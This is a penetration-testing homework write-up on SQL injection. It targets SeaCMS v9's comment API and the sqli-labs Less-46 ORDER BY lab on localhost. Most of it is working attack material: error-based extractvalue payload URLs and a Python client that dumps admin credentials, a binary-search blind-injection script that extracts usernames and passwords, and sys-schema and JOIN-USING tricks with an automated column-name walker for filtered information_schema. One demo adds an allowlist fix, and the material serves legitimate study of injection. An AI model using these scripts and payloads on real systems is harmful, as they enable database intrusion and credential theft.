Penetration Testing Homework 2

1. SeaCMS v9 error-based injection: extracting the administrator account and password

File containing the injectable code: seacmsv9.1\upload\comment\api\index.php

Injection point: the rlist[] query parameter ($rlist in the PHP source)

Source-code analysis shows that the following request injects successfully and returns the current database user (user()):

http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20user()))),@`%27`

The following request returns the current database name:

http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20database()))),@`%27`

The following request attempts to return a table name (a # comment plus newline, %23%0a, is inserted after select and from to split up the keywords):

http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%23%0atable_name%20from%23%0ainformation_schema.tables%20where%20table_schema%20=0x736561636d73%20limit%200,1))),@`%27`

Result: the injection fails.
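As an added example (not from the original write-up), here is a small Python client for the same rlist[] injection point that also handles the limit a practitioner hits right after user() and database(): MySQL shows at most 32 characters of the XPath string in the extractvalue() error, and the page's concat_ws(0x20, 0x5c, ...) prefix takes two of them, so a 32-character md5 hash does not fit in one request and has to be read in substr() windows. The URL, gid/page anchor and the @`'` quoting trick are the page's own; that the MySQL error text is echoed in the response body, and the sea_admin table with name/password columns used in the usage call, are assumptions.

```python
import re
import html as htmllib

# The page's injection point, with its gid=1&page=2 anchor.
TARGET = "http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php"

# MySQL reports at most 32 characters of the XPath string in the
# "XPATH syntax error" message; the "\ " prefix produced by
# concat_ws(0x20, 0x5c, ...) uses two, leaving 30 characters of data.
WINDOW = 30

# Pulls the leaked text out of "XPATH syntax error: '\ <data>'".
ERROR_RE = re.compile(r"XPATH syntax error: '\\ ([^']*)'")


def build_rlist_payload(expr):
    """The page's rlist[] element: @`'` closes and re-opens the quoting
    around the array element, extractvalue() raises the error carrying expr."""
    return "@`'`, extractvalue(1, concat_ws(0x20, 0x5c, (%s))),@`'`" % expr


def parse_leak(body):
    """Return the leaked string from a response body, or None when no
    XPATH error is present (HTML entities are decoded first)."""
    m = ERROR_RE.search(htmllib.unescape(body))
    return m.group(1) if m else None


def http_leak_window(expr, offset, length, session=None, url=TARGET):
    """Fetch `length` characters of expr starting at `offset` (1-based)
    through the real injection point. Assumes the MySQL error text is
    echoed in the body, as it is for the page's user()/database() requests."""
    import requests  # imported here so the offline parts work without it
    window_expr = "substr((%s),%d,%d)" % (expr, offset, length)
    params = {"gid": "1", "page": "2", "rlist[]": build_rlist_payload(window_expr)}
    res = (session or requests).get(url, params=params, timeout=10)
    return parse_leak(res.text)


def dump_value(expr, leak_window):
    """Read the whole value of expr, WINDOW characters per request, using any
    leak_window(expr, offset, length) -> str function (HTTP or a test stub).
    Stops when a window comes back short, empty or absent."""
    out = ""
    offset = 1
    while True:
        chunk = leak_window(expr, offset, WINDOW)
        if not chunk:
            break
        out += chunk
        if len(chunk) < WINDOW:
            break
        offset += WINDOW
    return out


if __name__ == "__main__":
    print(dump_value("select user()", http_leak_window))
    # Table and column names below are assumed for illustration; take the
    # real ones from the table-name step.
    print(dump_value("select concat(name,0x3a,password) from sea_admin limit 0,1",
                     http_leak_window))
```

dump_value() is transport-agnostic on purpose: the binary-search and windowing logic can be exercised offline against a stub, and only http_leak_window() touches the target.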

2. Boolean-based blind injection through ORDER BY

Boolean-based blind injection script (sqli-labs Less-46: the sort parameter lands inside ORDER BY, so if(cond,id,username) changes which row comes first, and the first cell of the result table is the oracle):
import requests
from lxml import html


# Ask the oracle: send the sort payload and return the first cell of the
# first row of the result table. Sorted by id that cell is "1"; sorted by
# username it is not.
def get_id_one(URL, payload):
    res = requests.get(url=URL, params=payload)
    tree = html.fromstring(res.content)
    id_one = tree.xpath('//table//tr[1]/td[1]/text()')[0].strip()
    return id_one


# Binary-search the ASCII code of character i of the SQL expression expr.
# ascii(...) > mid true -> ORDER BY id -> first cell "1" -> search upwards;
# false -> ORDER BY username -> search downwards. Converges on the code, or on
# 0 once substr() runs past the end of the string (ascii('') is 0).
def char_at(URL, expr, i):
    low, high = 0, 128
    while high > low:
        mid = (low + high) // 2
        payload = {"sort": f"if((ascii(substr(({expr}),{i},1))>{mid}),id,username) -- "}
        if get_id_one(URL, payload) == "1":
            low = mid + 1
        else:
            high = mid
    return low


# Dump expr character by character, up to max_len, stopping at end of string.
def extract(URL, expr, max_len):
    result = ""
    for i in range(1, max_len + 1):
        c = char_at(URL, expr, i)
        if c == 0:
            break
        result += chr(c)
    print(result)
    return result


# Database name
def database(URL):
    return extract(URL, "database()", 10)


# Table names
def table_name(URL):
    return extract(URL, 'select group_concat(table_name) from information_schema.tables where table_schema="security"', 40)


# Column names
def column_name(URL):
    return extract(URL, 'select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"', 25)


# Data
def datas(URL):
    return extract(URL, "select group_concat(username,0x3e,password) from users", 50)


if __name__ == '__main__':
    URL = "http://127.0.0.1/sqlilabs/Less-46/index.php"
    database(URL)
    table_name(URL)
    column_name(URL)
    datas(URL)

Result: (screenshot of the script output not included)
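To make the oracle in the script above tangible without a sqli-labs install, here is an added example (not part of the original write-up) that reproduces the vulnerable query shape against an in-memory SQLite database, runs the same binary search against it, and then shows the fix. SQLite stands in for MySQL: CASE WHEN replaces IF() and unicode() replaces ascii(); the users rows are constructed. Since ORDER BY cannot take a bound parameter, the fix is to map the request value onto an allowlist of column names instead of concatenating it.

```python
import sqlite3

# Constructed stand-in for the sqli-labs users table.
USERS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"),
         (3, "Dummy", "p@ssword"), (8, "admin", "admin")]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("create table users(id integer, username text, password text)")
    db.executemany("insert into users values(?,?,?)", USERS)
    return db


def vulnerable_query(db, sort):
    """Less-46 shape: the sort parameter is concatenated into ORDER BY."""
    return db.execute("SELECT * FROM users ORDER BY " + sort).fetchall()


def oracle(db, condition):
    """True iff the injected condition sorts by id, i.e. the first row is id 1
    (sorted by username the first row is Angelina, id 2). SQLite has no IF(),
    so MySQL's if(cond,id,username) becomes a CASE expression."""
    sort = "CASE WHEN (%s) THEN id ELSE username END" % condition
    return vulnerable_query(db, sort)[0][0] == 1


def char_at(db, expr, i):
    """Binary-search the code of character i of expr through the oracle.
    unicode('') is NULL in SQLite, so coalesce() turns end-of-string into 0."""
    low, high = 0, 128
    while high > low:
        mid = (low + high) // 2
        cond = "coalesce(unicode(substr((%s),%d,1)),0) > %d" % (expr, i, mid)
        if oracle(db, cond):
            low = mid + 1
        else:
            high = mid
    return low


def extract(db, expr, max_len=64):
    """Dump expr one character per binary search, stopping at end of string."""
    out = ""
    for i in range(1, max_len + 1):
        c = char_at(db, expr, i)
        if c == 0:
            break
        out += chr(c)
    return out


# Hardened version: the request value selects a column name from a fixed map.
SORT_COLUMNS = {"id": "id", "username": "username"}


def safe_query(db, sort):
    """ORDER BY cannot be parameterised, so anything outside the allowlist is
    rejected instead of being spliced into the statement."""
    try:
        column = SORT_COLUMNS[sort]
    except KeyError:
        raise ValueError("unknown sort column")
    return db.execute("SELECT * FROM users ORDER BY " + column).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(extract(db, "select group_concat(username||'>'||password) from users"))
    try:
        safe_query(db, "CASE WHEN (1=1) THEN id ELSE username END")
    except ValueError as e:
        print("rejected:", e)
```

Each leaked character costs about seven requests (log2 of 128), which is why the real script fixes a maximum length per value; the end-of-string check here is what stops it early.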

3. What to do when information_schema is filtered

If information_schema is filtered, how can table and column names still be queried?

Method 1: use the sys schema

List all database names:
SELECT DISTINCT table_schema FROM sys.schema_table_statistics;

List all table names in a database:
SELECT table_name FROM sys.schema_table_statistics WHERE table_schema = 'seacms';


#sys.schema_auto_increment_columns (only tables that have an AUTO_INCREMENT column)
#sys.schema_table_statistics_with_buffer
#mysql.innodb_table_stats
#mysql.innodb_index_stats
#all of these can stand in for information_schema, for schema and table names (not column names)

Caveats: the sys schema only exists from MySQL 5.7 onward, and reading it or the mysql.innodb_*_stats tables needs SELECT privilege on performance_schema or the mysql database, which the low-privilege account a web application normally runs as may not have. These views are fed by statistics, so a table that has never been opened (sys views) or that is not InnoDB (innodb_*_stats) may be missing from them.


Method 2: column-name-less injection

Use JOIN ... USING to leak column names

Get table names (sys.schema_auto_increment_columns in place of information_schema.tables):
?id=-1' union select 1,2,group_concat(table_name)from sys.schema_auto_increment_columns where table_schema=database()--+

Get column names: joining users with itself puts every column name into the derived table twice, and MySQL rejects that with "Duplicate column name '...'" naming the first duplicate. Adding that column to USING() merges it, so the next request reports the next column, and so on until the query runs without error. This requires the database error message to be visible in the response (error-based):
?id=-1' union select * from (select * from users as a join users as b)as c--+
?id=-1' union select * from (select * from users as a join users b using(id,username))c--+
?id=-1' union select * from (select * from users as a join users b using(id,username,password))c--+
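The USING() loop is mechanical, so here is an added example (not from the original write-up) that automates it. The payload builder reproduces the page's three requests for any table, and the walk keeps adding each column MySQL names in its "Duplicate column name" error until the query runs clean. It is driven by a leak function that returns the error text from a response, so it can run against a real target over HTTP (the ?id= query-string form of the page's payloads and an echoed MySQL error are assumptions) or, as in the usage call, against a stub that imitates MySQL for a constructed table.

```python
import re

DUP_RE = re.compile(r"Duplicate column name '([^']+)'")


def using_payload(table, known):
    """Build the page's self-join payload: a plain JOIN when nothing is known
    yet, otherwise every column found so far goes into USING()."""
    if known:
        join = "%s as a join %s b using(%s)" % (table, table, ",".join(known))
    else:
        join = "%s as a join %s as b" % (table, table)
    return "-1' union select * from (select * from %s)c--+" % join


def parse_duplicate(body):
    """Return the column named in a MySQL 'Duplicate column name' error, or None."""
    m = DUP_RE.search(body)
    return m.group(1) if m else None


def walk_columns(table, leak, max_columns=64):
    """Recover column names in table order. leak(payload) returns the error
    text produced for that payload ("" when the query succeeded). Stops when
    the self-join no longer reports a duplicate."""
    known = []
    for _ in range(max_columns):
        column = parse_duplicate(leak(using_payload(table, known)))
        if column is None or column in known:
            break
        known.append(column)
    return known


def http_leak(url, session=None):
    """Leak function for a real target: sends the payload as the id parameter
    and returns the body. Assumes the application echoes the MySQL error.
    requests is imported lazily so the offline parts work without it."""
    import requests
    from urllib.parse import quote

    def leak(payload):
        # keep '+' unencoded so it decodes to the space MySQL needs after '--'
        full = url + "?id=" + quote(payload, safe="+")
        return (session or requests).get(full, timeout=10).text
    return leak


def mysql_stub(columns):
    """Imitates MySQL for the self-join of a table with the given columns:
    the first column not listed in USING() appears twice in the derived
    table, so the server refuses it with error 1060."""
    def leak(payload):
        m = re.search(r"using\(([^)]*)\)", payload)
        used = m.group(1).split(",") if m else []
        for col in columns:
            if col not in used:
                return "#1060 - Duplicate column name '%s'" % col
        return ""
    return leak


if __name__ == "__main__":
    # Constructed table layout standing in for sqli-labs' users.
    stub = mysql_stub(["id", "username", "password"])
    print(walk_columns("users", stub))
```

Once every column is in USING() the server may instead complain that the UNION's two sides have different column counts; that is not a duplicate-column error, so the walk stops there as well, which is the intended end condition.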